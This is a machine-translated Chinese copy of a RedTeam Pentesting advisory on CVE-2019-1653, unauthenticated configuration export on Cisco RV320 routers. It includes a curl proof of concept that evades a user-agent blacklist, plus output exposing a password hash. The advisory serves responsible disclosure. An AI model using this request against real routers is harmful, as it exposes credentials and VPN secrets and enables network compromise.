Cisco RV320未经身份验证的配置导出

RedTeam Pentesting发现了Cisco RV320
路由器可以通过无需身份验证的网络配置导出安全问题


细节
=======

产品：Cisco RV320双千兆WAN VPN路由器，可能还有其他
受影响的版本：1.4.2.15到1.4.2.20
修正版本：无
漏洞类型：信息披露
安全风险：高
供应商网址：https：//tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
供应商状态：处理补丁
咨询网址：https：//www.redteam-pentesting.de/advisories/rt-sa-2019-003
咨询状态：已发布
CVE：CVE-2019-1653
CVE网址：https：//cve.mitre.org/cgi-bin/cvename.cgi？name = CVE-2019-1653


介绍
============

“让您的员工，您的企业和您自己保持高效工作
有效。 Cisco RV320双千兆WAN VPN路由器是理想的选择
任何寻求绩效的小型办公室或小型企业的选择，
安全性和网络的可靠性。“
（来自Cisco RV320产品页面[1]）


更多细节
============

Cisco RV320双千兆WAN VPN路由器提供基于Web的
配置界面，在各种CGI程序中实现
设备的固件。访问此Web界面需要事先
使用用户名和密码进行身份验证以前，RedTeam
Pentesting在CGI中发现了一个漏洞（rt-sa-2018-002）[2]
页面：

/cgi-bin/config.exp

通过向该程序发出HTTP GET请求，可以实现
导出路由器的配置，而不提供任何先前的
认证。此漏洞在固件版本中得到了解决
1.4.2.19由思科发布[3]。

RedTeam Pentesting发现修补后的CGI程序
固件仍然容易受到攻击通过执行特制的HTTP
POST请求，攻击者仍然能够下载路由器
组态。用户代理“curl”被固件列入黑名单
必须在HTTP客户端中进行调整。再次，剥削不会
需要任何身份验证


概念证明
================

可以通过发出HTTP POST请求来检索设备的配置
易受攻击的CGI程序（缩短输出）：

-------------------------------------------------- ----------------------
$ curl -s -k -A kurl -X POST --data'reportbkconfig = 0'\
  'https://192.168.1.1/cgi-bin/config.exp'
#### SYSCONFIG ####
[版]
VERSION = 73
MODEL = RV320
SSL = 0
IPSEC = 0
PPTP = 0
PLATFORMCODE = RV0XX
[...]
[系统]
HOSTNAME =路由器
DOMAINNAME = example.com
DOMAINCHANGE = 1
USERNAME =思科
PASSWD = 066bae9070a9a95b3e03019db131cd40
[...]
-------------------------------------------------- ----------------------


解决方法
==========

防止不受信任的客户端连接到设备的Web服务器。


固定
===

没有


安全风险
=============

此漏洞因暴露设备而被评为高风险
配置为不受信任的潜在恶意方。通过
下载配置，攻击者可以获取内部网络
配置，VPN或IPsec机密，以及密码哈希
路由器的用户帐户。知道用户的密码哈希是
足以登录路由器的Web界面，破解哈希
不需要。通过利用此获得的任何信息
漏洞可用于促进设备的进一步危害
本身或附加的网络。


时间线
========

2018-09-19确定原始漏洞
2018-09-27客户批准向供应商披露
2018-09-28供应商通知
2018-10-05收到供应商承认的咨询
2018-10-05披露日期：2019-01-09的公告供应商
2018-11-18供应商提供的受影响版本列表
2018-12-21按供应商的要求将披露延迟至2019-01-23
2019-01-22供应商发布的固件1.4.2.20
2019-01-23咨询（rt-sa-2018-002）出版

2019-02-07发现漏洞的不完全缓解
2019-02-08发送给供应商的概念证明
2019-02-08收到供应商承认的概念证明
2019-02-15发送给供应商的完整咨询
2019-02-15披露日期：2019-03-27
2019-03-25请求供应商更新进度
2019-03-25供应商要求延期披露
2019-03-25推迟下降
2019-03-27咨询发布


参考
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting提供由a执行的个人渗透测试
专业的IT安全专家团队。因此，安全方面存在缺陷
公司网络或产品被揭露，可以立即修复。

由于该领域的专家很少，RedTeam Pentesting希望如此
通过研究分享其知识并增强公众知识
SECU